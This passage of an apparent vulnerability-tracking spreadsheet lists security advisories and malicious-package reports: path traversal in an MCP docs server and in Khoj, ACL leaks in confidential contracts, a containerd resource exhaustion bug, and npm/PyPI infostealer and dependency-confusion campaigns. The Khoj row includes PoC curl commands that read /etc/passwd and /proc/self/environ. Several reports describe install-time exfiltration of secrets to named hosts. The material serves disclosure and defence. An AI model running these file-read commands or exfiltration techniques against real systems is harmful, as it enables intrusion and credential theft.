// No containment check: strings.HasPrefix(absPath, baseDir)
// No rejection of ".." or absolute paths
```
`filepath.Join` resolves `../` sequences, allowing attackers to escape the intended directory:
- Input: `"../../../etc/passwd"`
- Result: `/project/.knowns/docs/../../../etc/passwd` → `/etc/passwd`
### Rename-as-Delete Authorization Bypass
The `Rename()` function performs two operations:
1. Write the file to the new location (`newAbsPath`)
2. Delete the file from the old location (`oldAbsPath`)
Both paths are vulnerable to traversal. An attacker can:
- Set `path` to a file outside the project (e.g., `"../../../victim/target.md"`)
- Set `newPath` to another location outside the project
- The `Rename()` function will delete the file at `path` (outside the project)
Because `docs.update` is classified as `CapWrite` rather than `CapDelete`, this operation bypasses deletion restrictions in `read-write-no-delete` presets.
### Compounding Factor - Unauthenticated Access
Due to the previously identified **Auth Bypass** vulnerability, all MCP tools are accessible without credentials when the server is started without a password, making this a zero-credential attack.
## Fix
*Patch is available right now at [New Release](https://github.com/knowns-dev/knowns/releases).*</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86439</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>GHSA-29h2-jr22-frmh</t>
        </is>
      </c>
      <c r="D7" s="5" t="inlineStr"/>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr">
        <is>
          <t>npm:@openzeppelin/confidential-contracts</t>
        </is>
      </c>
      <c r="M7" s="5" t="inlineStr">
        <is>
          <t>0.3.2, 0.4.2, 0.5.2</t>
        </is>
      </c>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr"/>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>### Impact
Two locations consume an encrypted handle returned by an untrusted external party and use it without verifying that the party is ACL-authorized on it.
#### `VestingWalletConfidential`
Malicious users can call `release` with a malicious token. This token could return an alternative handle on `confidentialBalanceOf`, which represents the balance of the vesting wallet on an alternative ERC-7984 token (or any other handle that the vesting wallet has access to). The vesting wallet does not check that the token has ACL access and grants access to a new handle derived from the returned handle.
Effectively, this bug allows a malicious user to gain information about any private `euint64` handle that the vesting wallet has access to via a malicious ERC-7984 token. There is no loss of funds.
#### ERC7984
On a transfer with callback, `ERC7984` uses the `ebool` returned by the
recipient's `IERC7984Receiver.onConfidentialTransferReceived` to drive the refund
logic, without checking that the recipient has ACL access to it. A malicious recipient
can return any `ebool` the token has access to and recover its plaintext from the
refund result, which the token grants the caller access to. The leak is limited
to `ebool` handles (the value is only used as an `FHE.select` condition), and
there is no loss of funds.
### Patches
Both issues were fixed in the same patch releases: v0.5.2, v0.4.2, v0.3.2
- `VestingWalletConfidential`: 93e75ceed2b9648f53f9d133f431064353456805 (#423).
- `ERC7984` transfer callback: fe0863af2c9dce7614acce98720a913bf6a767a5 (#428), with follow-up ee47edf189ab681cebdad18bfb53dee541987be2 (#431) permitting an uninitialized returned handle.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-29h2-jr22-frmh</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>GHSA-62mm-xwmv-crhg</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr">
        <is>
          <t>PyPI:khoj</t>
        </is>
      </c>
      <c r="M8" s="5" t="inlineStr">
        <is>
          <t>2.0.0-beta.25</t>
        </is>
      </c>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr"/>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `/home/{file_path:path}` endpoint in `web_client.py` serves static files by directly concatenating the user-supplied `file_path` with the `home_directory` constant. There is no path traversal filtering, no path normalization check, and no authentication required. An attacker can use `../` sequences to read arbitrary files from the server filesystem.
### Details
**Vulnerable code** — `src/khoj/routers/web_client.py` lines 46-49:
```python
@web_client.get("/home/{file_path:path}", response_class=FileResponse)
def home_static_files(file_path: str):
    """Serve static files from the home landing page directory"""
    return FileResponse(constants.home_directory / file_path)
```
Where `home_directory` is defined in `src/khoj/utils/constants.py` line 6:
```python
home_directory = web_directory / "home/"
```
**What is missing:**
- No `..` traversal filtering
- No path normalization/resolution check (e.g., `resolved.is_relative_to(home_directory)`)
- No authentication decorator (`@requires(["authenticated"])` is absent)
- Starlette's `FileResponse` does NOT perform path traversal protection
**Path resolution:**
```
Request: GET /home/../../../../../../../etc/passwd
file_path = "../../../../../../../etc/passwd"
home_directory / file_path = /app/src/khoj/interface/web/home/../../../../../../../etc/passwd
OS resolves to: /etc/passwd
```
### PoC
```bash
# Read /etc/passwd (no authentication required)
curl http://localhost:42110/home/../../../../../../../etc/passwd
# Read application settings (may contain SECRET_KEY, DB credentials)
curl http://localhost:42110/home/../../../../settings.py
# Read environment file
curl http://localhost:42110/home/../../../../../../../proc/self/environ
```
URL-encoded variant (may bypass some reverse proxy normalization):
```bash
curl http://localhost:42110/home/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
```
### Impact
Unauthenticated arbitrary file read. An attacker with network access to the Khoj instance can:
- **Read application configuration** — Django `SECRET_KEY`, database credentials, API keys
- **Read system files** — `/etc/passwd`, `/etc/shadow` (if permissions allow), `/proc/self/environ`
- **Exfiltrate sensitive data** — Any file readable by the server process
- **Facilitate further attacks** — Leaked credentials enable deeper compromise
**No authentication required** — the endpoint has no auth decorators, making it exploitable by any network-reachable attacker.
### Recommended fix
Use FastAPI's built-in `StaticFiles` mount instead of a custom handler, or add explicit path validation:
```python
@web_client.get("/home/{file_path:path}", response_class=FileResponse)
def home_static_files(file_path: str):
    resolved = (constants.home_directory / file_path).resolve()
    if not resolved.is_relative_to(constants.home_directory.resolve()):
        raise HTTPException(status_code=404)
    return FileResponse(resolved)
```</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-62mm-xwmv-crhg</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>GHSA-7qx8-98q7-66p4</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr"/>
      <c r="E9" s="5" t="inlineStr"/>
      <c r="F9" s="5" t="inlineStr"/>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr">
        <is>
          <t>npm:@nubjs/types</t>
        </is>
      </c>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr"/>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (1b292cfe4598353bc8491677099fd2c056f4136eb686345bbdbe68fa887e368c)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9" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17186</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17181</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr"/>
      <c r="E10" s="5" t="inlineStr"/>
      <c r="F10" s="5" t="inlineStr"/>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>PyPI:reqparser</t>
        </is>
      </c>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr"/>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (982923c14e644e82a839621d37715fd123568fc378aed45b6afa6247bc0b5054)
During the module import, the package starts an infostealer. It exfiltrates data from crypto currency wallets and web browsers, ensures persistence and installs further malware.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-reqparser
Reasons (based on the campaign):
 - malware
 - persistence
 - exfiltration-crypto
 - exfiltration-browser-data
 - The package contains code to detect if it is running in a sandbox environment.
 - infostealer
 - keylogger
</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17181</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17182</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr"/>
      <c r="E11" s="5" t="inlineStr"/>
      <c r="F11" s="5" t="inlineStr"/>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr">
        <is>
          <t>npm:app-sca-info-banking</t>
        </is>
      </c>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr"/>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9733b1d7500efca385ba6dc866f4ef1b04e0d1cd4ead564b9445551a2d72a51b)
package.json declares scripts.postinstall: `node poc.js`, causing poc.js to execute automatically on npm install. poc.js issues DNS (dns.resolve4) and HTTP (http.get) callbacks to unique subdomains under ki6rmdjnq5q8y7v8soxc080fz65ytohd.oastify.com (a Burp Suite Collaborator / OAST host) and writes a marker file under os.tmpdir(). The package's main entry is an empty stub (module.exports = {}); the postinstall payload is the package's only functionality. The DNS/HTTP callbacks to an attacker-controlled OAST domain confirm arbitrary code execution on the installer's host and leak install-event metadata to a third-party endpoint.
## Source: ossf-package-analysis (3f5e6f43a1552d09c016e2db6c287a1972a70df70fa7a42d3049840d04580bd4)
The OpenSSF Package Analysis project identified 'app-sca-info-banking' @ 0.0.24 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17182</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17183</t>
        </is>
      </c>
      <c r="D12" s="5" t="inlineStr"/>
      <c r="E12" s="5" t="inlineStr"/>
      <c r="F12" s="5" t="inlineStr"/>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>pypi, go</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr">
        <is>
          <t>PyPI:tego-managed-agents-test</t>
        </is>
      </c>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr"/>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (72c8a01de8d706d83a4b80b845099c11602ba778a392337cad2d9a8a40090b5d)
The package's custom install command serializes the entire process environment (dict(os.environ)) to JSON and POSTs it to the hardcoded endpoint https://gateway.tego.security during `pip install`. The exfiltration runs automatically as part of the install lifecycle without user consent, and exceptions are silently swallowed so no error is surfaced to the installer. Because process environments on developer and CI hosts routinely contain credentials (AWS_ACCESS_KEY_ID/AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, NPM_TOKEN, database passwords, and other secret-shaped variables), this indiscriminate bulk-environment upload is a credential-harvesting exfiltration path from installer to a remote author-controlled host.
## Source: kam193 (b09488c67894dd74d043a240308c694f0e42464e3a4f371b8d5ebc8a6a589d7b)
During installation, the code exfiltrates all environment variables to a remote location.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-tego-managed-agents-test
Reasons (based on the campaign):
 - exfiltration-env-variables
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17183</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17184</t>
        </is>
      </c>
      <c r="D13" s="5" t="inlineStr"/>
      <c r="E13" s="5" t="inlineStr"/>
      <c r="F13" s="5" t="inlineStr"/>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>npm, typescript</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr">
        <is>
          <t>npm:@airbnb-extended/typescript-config</t>
        </is>
      </c>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr"/>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8424e4bf8731b950511535a2cb9b41b0bedba02092a73ea304b6730f04aa95fe)
package.json for @airbnb-extended/typescript-config@99.9.1 declares a dependency `ltidisafe` sourced from a bare HTTPS tarball URL (https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.7.8.tgz) instead of a registry version range. On `npm install`, npm fetches and installs whatever bytes that URL returns, executing any lifecycle scripts inside the fetched tarball. The source is unpinned by integrity hash, is not the npm registry, and is unrelated to any Airbnb-published infrastructure. The scope/name also mimics the well-known `@airbnb/typescript-config` package, and the version `99.9.1` is implausibly high — a dependency-confusion / lure shape designed to win resolution against a legitimate internal or public package. The tarball URL is mutable by whoever controls the storage bucket, so the delivered payload can change at any time.
</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17184</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17185</t>
        </is>
      </c>
      <c r="D14" s="5" t="inlineStr"/>
      <c r="E14" s="5" t="inlineStr"/>
      <c r="F14" s="5" t="inlineStr"/>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr">
        <is>
          <t>npm:shoplist-app</t>
        </is>
      </c>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr"/>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (fdceadb01f08162934382b121e813236b86adc0d4d74b7b2f062c78e529c34f6)
shoplist-app@99.99.99 is a dependency-confusion / typosquat beacon. preinstall.js is wired into every lifecycle hook (preinstall, install, postinstall, prepare, prepublish) and issues an HTTPS GET to the hardcoded endpoint https://eo8f3m3ho26a0nm.m.pipedream.net/, transmitting the installer's machine hostname via os.hostname() (smuggled into a `host` HTTP header) together with package identity in the query string. index.js — the package `main` — independently fires a second HTTPS GET to the same Pipedream collector at require/import time, carrying os.platform() and a `trigger=runtime` marker. The package ships no functional code beyond these beacons; its version (99.99.99) and description ("test") are consistent with a name-squat probe designed to identify which internal build hosts resolve the name shoplist-app. The exfiltrated data (hostname, OS platform, package-name confirmation) gives the operator of the Pipedream endpoint a map of environments where a shoplist-app dependency reference successfully resolves to this public package — the standard reconnaissance stage of a dependency-confusion attack.
</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17185</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17187</t>
        </is>
      </c>
      <c r="D15" s="5" t="inlineStr"/>
      <c r="E15" s="5" t="inlineStr"/>
      <c r="F15" s="5" t="inlineStr"/>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr">
        <is>
          <t>npm:@digift/cli</t>
        </is>
      </c>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr"/>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ossf-package-analysis (5508ba462afd4a4d6f311cca1a00d728ea27b8fe03a2fba93878a9fabbb7f309)
The OpenSSF Package Analysis project identified '@digift/cli' @ 99.99.100 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17187</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17188</t>
        </is>
      </c>
      <c r="D16" s="5" t="inlineStr"/>
      <c r="E16" s="5" t="inlineStr"/>
      <c r="F16" s="5" t="inlineStr"/>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr">
        <is>
          <t>PyPI:sherpy</t>
        </is>
      </c>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr"/>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (2e5440f1e24545fd14e73c7fc459a9abf893f4674683899ed29ff7c4189416b6)
When used, the package exfiltrates Chrome extension files (likely targeting cryptocurrency wallets) and sensitive Telegram files.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-sherpy
Reasons (based on the campaign):
 - infostealer
 - exfiltration-crypto
 - target:telegram
 - native-extension
</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17188</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53493</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr">
        <is>
          <t>go:github.com/containerd/containerd, go:github.com/containerd/containerd/v2</t>
        </is>
      </c>
      <c r="M17" s="5" t="inlineStr">
        <is>
          <t>1.7.36, 2.0.13, 2.2.9, 2.3.6, 2.4.1</t>
        </is>
      </c>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr"/>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770, CWE-834</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>### Impact
A vulnerability exists in containerd's image pull handlers where a crafted OCI image index containing deeply nested or heavily fanned-out descriptor graphs can cause unbounded CPU and memory consumption. During the `PullImage` operation, the recursive traversal and processing of child descriptors lack sufficient depth and breadth limits, and fail to adequately deduplicate identical descriptors. This unbounded traversal leads to excessive resource allocation.
Consequently, pulling a malicious image reference can result in prolonged stalls during container creation and significant resource pressure on the host system. This issue occurs entirely during the image pull phase, prior to any container execution.
### Patches
This bug has been fixed in containerd 2.4.1, 2.3.6, 2.2.9, 2.0.13, and 1.7.36. Users should update to these versions to resolve the issue.
### Workarounds
There are no known workarounds for this issue. Users are advised to only pull trusted images from known registries until the patch can be applied.
### Credits
The containerd project would like to thank Jakub Ciolek at ElevenLabs and @jlgore who independently discovered and responsibly disclosed this issue in accordance with the [containerd security policy](https://github.com/containerd/project/blob/main/SECURITY.md).
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [containerd](https://github.com/containerd/containerd/issues/new/choose)
* Email us at [security@containerd.io](mailto:security@containerd.io)
To report a security issue in containerd:
* [Report a new vulnerability](https://github.com/containerd/containerd/security/advisories/new)
* Email us at [security@containerd.io](mailto:security@containerd.io)</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53493</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57440</t>
        </is>
      </c>
      <c r="D18" s="5" t="inlineStr"/>
      <c r="E18" s="5" t="inlineStr"/>
      <c r="F18" s="5" t="inlineStr"/>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr">
        <is>
          <t>composer:starcitizenwiki/embedvideo</t>
        </is>
      </c>
      <c r="M18" s="5" t="inlineStr">
        <is>
          <t>4.1.0</t>
        </is>
      </c>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr"/>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-80</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>### Summary
With $wgEmbedVideoRequireConsent disabled (not the default), the urls for videos are passed into an iframe src attribute without sanitization. When given a malformed url or id, the src attribute can be escaped via double quotes, allowing for html/javascript injection.
### Details
